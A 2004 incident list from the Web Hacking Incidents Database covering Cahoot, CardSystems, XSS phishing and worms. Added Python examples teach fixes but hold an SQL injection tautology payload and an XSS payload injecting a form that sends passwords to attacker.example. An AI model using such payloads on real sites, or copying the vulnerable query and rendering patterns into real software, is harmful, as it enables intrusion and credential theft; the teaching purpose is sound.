The Web Hacking Incidents Database Last update:17 February 2008
List of Incidents for a Year
Select Year: 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008
List of incidents for the year 2004
18 incidents listed
Reported: 25 October 2007; Occurred: 01 November 2004
Classifications:
- Attack Method: Insufficient Authentication
- Attack Method: Predictable Resource Location
- Outcome: Disclosure Only
Following a software upgrade, Cahoot, a UK Internet-only bank, allowed access to customer accounts by guessing their user names: at least one page returned an account when only the user name was supplied in the URL, with no further authentication. The bug was open for 12 days before being discovered.
The site was taken offline for 10 hours to fix the issue. It is a significant incident, as it is one of the rare occasions where a vulnerability was serious enough to force the organization to take the site offline until it was fixed.
We somehow missed this story, so it finds its way into WHID only now, in late 2007.
References:
Reported: 20 April 2006; Occurred: 01 September 2004
Classifications:
- Attack Method: SQL Injection
This entry is a very important one. Most are already familiar with the infamous CardSystems incident, in which hackers stole 263,000 credit card numbers, exposed 40 million more, and made several million dollars of fraudulent credit and debit card purchases with the resulting counterfeit cards. As a result of the breach CardSystems nearly went out of business and was eventually purchased by PayByTouch. CardSystems is considered by many the most severe publicized information security breach ever, and it caused the company's shareholders, financial institutions and card holders damage of millions of dollars.
But since the publication of the incident a year ago, the way in which the breach occurred has remained a mystery.
Recent articles about the case (listed below) reveal that SQL injection was used by the attackers to install a malicious script on the CardSystems web application database. The script was scheduled to run every four days, extract records, zip them and export them to an FTP site.
This is one of the most stunning examples of a web application security hole being used to launch a targeted attack in order to steal money.
References:
- Cleaning up after a hack job: CardSystems' Christensen
News Story, Information Security (mirror), 14 April 2006
- FTC complaint In the Matter of CardSystems Solutions
Legal Document, FTC
- Midrange CardSystems Wiki
Wiki, Midrange
- CardSystems was a Web Application Hack
Mailing List Post, Cesar Cerrudo, Argeniss, 18 April 2006
- CardSystems Exposes 40 Million Identities
Blog Entry, Bruce Schneier, 23 June 2005
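The entry above describes a chain that starts with SQL injection. The following is an added example, not code from WHID or from CardSystems, and it reproduces only that first link: a query built by string concatenation, which lets attacker-supplied text change the SQL, beside the parameterized form. The table, merchant names and card numbers are constructed test values; the scheduled export stage of the real incident is not modelled.

```python
"""Added example: string-built SQL versus a bound parameter, on sqlite3.
Not code from WHID or CardSystems; all data below is constructed."""
import sqlite3

# Constructed sample data (well-known test PANs, not real cards).
SCHEMA = """
CREATE TABLE cards (id INTEGER PRIMARY KEY, merchant TEXT NOT NULL, pan TEXT NOT NULL);
INSERT INTO cards (merchant, pan) VALUES
    ('shop-a', '4111111111111111'),
    ('shop-b', '5555555555554444'),
    ('shop-b', '378282246310005');
"""


def new_db() -> sqlite3.Connection:
    """Fresh in-memory database populated with the constructed rows."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def vulnerable_lookup(db: sqlite3.Connection, merchant: str) -> list:
    """Returns the PANs stored for one merchant.

    The merchant name is pasted straight into the statement, so a quote in the
    input ends the string literal and everything after it is parsed as SQL.
    """
    sql = f"SELECT pan FROM cards WHERE merchant = '{merchant}'"
    return [row[0] for row in db.execute(sql)]


def safe_lookup(db: sqlite3.Connection, merchant: str) -> list:
    """Same query with the merchant passed as a bound parameter.

    A parameter is always treated as data, so the shape of the statement
    cannot change no matter what the input contains.
    """
    sql = "SELECT pan FROM cards WHERE merchant = ?"
    return [row[0] for row in db.execute(sql, (merchant,))]


# Classic tautology payload: closes the literal and appends a condition that is
# true for every row, so the merchant filter is bypassed and every PAN in the
# table comes back. (sqlite3's execute() refuses stacked statements, which is
# why this example stops at disclosure rather than installing anything.)
PAYLOAD = "' OR '1'='1"

if __name__ == "__main__":
    db = new_db()
    print("vulnerable, payload:", vulnerable_lookup(db, PAYLOAD))
    print("parameterized, payload:", safe_lookup(db, PAYLOAD))
```

Run it and the vulnerable lookup returns all three PANs for the payload while the parameterized lookup returns none, because no merchant is literally named `' OR '1'='1`.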
Reported: 08 November 2005; Occurred: 06 December 2004
Classifications:
- Attack Method: Cross Site Scripting (XSS)
- Attack Method: Content Spoofing
Phishing based on XSS (same vulnerability, but a different attack than the similar September 2004 attack)
References:
Reported: 04 August 2005; Occurred: 26 January 2004
Classifications:
- Attack Method: Credential/Session Prediction
- Outcome: Disclosure Only
References:
Reported: 04 August 2005; Occurred: 02 February 2004
Classifications:
- Attack Method: Credential/Session Prediction
- Outcome: Disclosure Only
References:
Reported: 04 August 2005; Occurred: 02 February 2004
Classifications:
- Attack Method: SQL Injection
- Outcome: Disclosure Only
References:
Reported: 04 August 2005; Occurred: 02 February 2004
Classifications:
- Attack Method: Insufficient Authorization
- Outcome: Disclosure Only
References:
Reported: 04 August 2005; Occurred: 02 February 2004
Classifications:
- Attack Method: Insufficient Authorization
- Outcome: Disclosure Only
References:
Reported: 04 August 2005; Occurred: 26 January 2004
Classifications:
- Attack Method: Insufficient Authorization
- Outcome: Disclosure Only
References:
Reported: 04 August 2005; Occurred: 02 February 2004
Classifications:
- Attack Method: Insufficient Authorization
- Outcome: Disclosure Only
References:
Reported: 11 July 2005; Occurred: 27 December 2004
Classifications:
- Attack Method: Cross Site Scripting (XSS)
- Outcome: Disclosure Only
An XSS was found in Lycos Web Mail
References:
Reported: 11 July 2005; Occurred: 27 October 2004
Classifications:
- Attack Method: Cross Site Scripting (XSS)
- Outcome: Disclosure Only
An XSS was found in Gmail
References:
Reported: not recorded; Occurred: 25 December 2004
Classifications:
- Attack Method: OS Commanding
phpBB worm
References:
Reported: not recorded; Occurred: 21 December 2004
Classifications:
- Attack Method: OS Commanding
Worm used Google to locate sites vulnerable to OS commanding
References:
Reported: not recorded; Occurred: 28 September 2004
Classifications:
- Attack Method: Cross Site Scripting (XSS)
- Country: USA
- Outcome: Phishing
- Vertical: Finance
Phishing based on XSS
References:
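The entry above and the December 2004 entry earlier on this page both record phishing built on a cross-site scripting flaw. The following is an added example, not code from WHID or from any of the affected sites, showing why a reflected parameter on a login page is enough for content spoofing: the attacker's text is rendered as part of the bank's own page, on the bank's own host name. The page template, message codes and payload are constructed for illustration.

```python
"""Added example: a reflected XSS on a login page used for phishing, beside
two hardened renderings. Not code from WHID or any site named on the page;
the template, message codes and payload below are constructed."""
import html

# Hardened variant 2 goes beyond escaping: the page only ever renders text
# chosen server-side, selected by a short code. Unknown codes render nothing.
MESSAGES = {
    "bad_password": "The password you entered is incorrect.",
    "timeout": "Your session has expired. Please sign in again.",
}

_FORM_TAIL = '<input name="user"><input name="pass" type="password"></form>'


def render_login_vulnerable(msg: str) -> str:
    """A ?msg=... value from the URL is written into the page verbatim."""
    return f'<form action="/login" method="post"><p class="error">{msg}</p>{_FORM_TAIL}'


def render_login_escaped(msg: str) -> str:
    """Escaping turns <, >, &, ' and " into entities, so the text cannot open a tag."""
    safe = html.escape(msg, quote=True)
    return f'<form action="/login" method="post"><p class="error">{safe}</p>{_FORM_TAIL}'


def render_login_by_code(msg_code: str) -> str:
    """Strongest option: never reflect free text at all, only a server-side lookup."""
    text = html.escape(MESSAGES.get(msg_code, ""), quote=True)
    return f'<form action="/login" method="post"><p class="error">{text}</p>{_FORM_TAIL}'


# Constructed phishing payload: closes the genuine paragraph and form, opens a
# look-alike form that posts to the attacker, then comments out the rest of
# the real form so the page still looks intact.
PAYLOAD = (
    '</p></form><form action="https://attacker.example/collect" method="post">'
    'Please re-enter your password: <input name="pass" type="password"></form><!--'
)


def spoofed_form_present(page: str) -> bool:
    """Crude marker check, used only to compare the three renderings above."""
    return 'action="https://attacker.example' in page


if __name__ == "__main__":
    for name, render in (("vulnerable", render_login_vulnerable),
                         ("escaped", render_login_escaped),
                         ("by code", render_login_by_code)):
        print(f"{name:10s} spoofed form present: {spoofed_form_present(render(PAYLOAD))}")
```

The escaped rendering stops the injection but still lets an attacker put arbitrary (harmless) text on the bank's page; the code-lookup rendering removes the reflection entirely, which is the fix to prefer when the set of messages is known in advance.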
Reported: not recorded; Occurred: 04 March 2004
Classifications:
- Attack Method: Insufficient Authorization
Previously moderated weather announcements could be changed by the user
References:
Reported: not recorded; Occurred: 14 June 2004
Classifications:
- Attack Method: Insufficient Authentication
- Attack Method: Insufficient Authorization
- Outcome: Disclosure Only
A billing information system required only phone number and zip code to pull up account details
References:
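The billing entry above and the Cahoot entry at the top of this page share one anti-pattern: something the requester supplies (a user name in the URL, a phone number plus ZIP code) is treated as proof of identity. The following is an added example, not code from WHID, Cahoot or the billing system, that shows both vulnerable lookups beside a version in which identity comes only from an authenticated session and any account selector in the request is checked against it. The account data, passwords and session store are constructed.

```python
"""Added example: identifier-as-authentication versus a session-bound check.
Not code from WHID or from either organization; all data is constructed."""
import secrets
from typing import Optional

# Constructed sample data. Every field here is either guessable (user names)
# or semi-public (phone numbers, ZIP codes), which is the point.
ACCOUNTS = {
    "jsmith": {"phone": "5551234567", "zip": "94305", "balance": 1250.00},
    "alee": {"phone": "5559876543", "zip": "10001", "balance": 87.50},
}
# Constructed plaintext credentials for the demo only; a real system stores hashes.
PASSWORDS = {"jsmith": "correct horse", "alee": "battery staple"}


def vulnerable_account_by_url(query_params: dict) -> Optional[dict]:
    """Cahoot-style: whatever user name is in the URL selects the account.

    No session is consulted, so any user name that exists discloses that
    customer's data to whoever guessed it.
    """
    return ACCOUNTS.get(query_params.get("user", ""))


def vulnerable_account_by_phone_zip(phone: str, zip_code: str) -> Optional[dict]:
    """Billing-system style: facts an attacker can look up act as the credential."""
    for account in ACCOUNTS.values():
        if account["phone"] == phone and account["zip"] == zip_code:
            return account
    return None


# Hardened path: session token -> authenticated user name.
SESSIONS = {}


def login(username: str, password: str) -> Optional[str]:
    """Issues an unguessable session token after a (constructed) credential check."""
    if not secrets.compare_digest(PASSWORDS.get(username, ""), password):
        return None
    token = secrets.token_urlsafe(32)  # 256 bits of randomness, unlike a user name
    SESSIONS[token] = username
    return token


def hardened_account(session_token: Optional[str], query_params: dict) -> Optional[dict]:
    """Returns an account only to a logged-in caller who owns it.

    Returns None both for a missing or invalid session (insufficient
    authentication) and for a valid session asking for someone else's
    account (insufficient authorization).
    """
    owner = SESSIONS.get(session_token or "")
    if owner is None:
        return None
    requested = query_params.get("user", owner)
    if requested != owner:
        return None
    return ACCOUNTS[owner]


if __name__ == "__main__":
    print("url lookup, no login:", vulnerable_account_by_url({"user": "jsmith"}))
    print("phone+zip, no login:", vulnerable_account_by_phone_zip("5551234567", "94305"))
    print("hardened, no login:", hardened_account(None, {"user": "jsmith"}))
    token = login("alee", "battery staple")
    print("hardened, other account:", hardened_account(token, {"user": "jsmith"}))
    print("hardened, own account:", hardened_account(token, {}))
```

The fix is not to validate the user name harder; it is to stop using request-supplied identifiers as the source of identity and to derive the account from the session, then treat any identifier in the request as an authorization question.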
Reported: not recorded; Occurred: 30 June 2004
Classifications:
- Attack Method: Cross Site Scripting (XSS)
- Attack Method: SQL Injection
- Outcome: Disclosure Only
References:
This work is licensed under the Creative Commons Attribution License. To view a copy of this license, visit http://creativecommons.org/licenses/by/2.5/ or send a letter to Creative Commons, 559 Nathan Abbott Way, Stanford, California 94305, USA.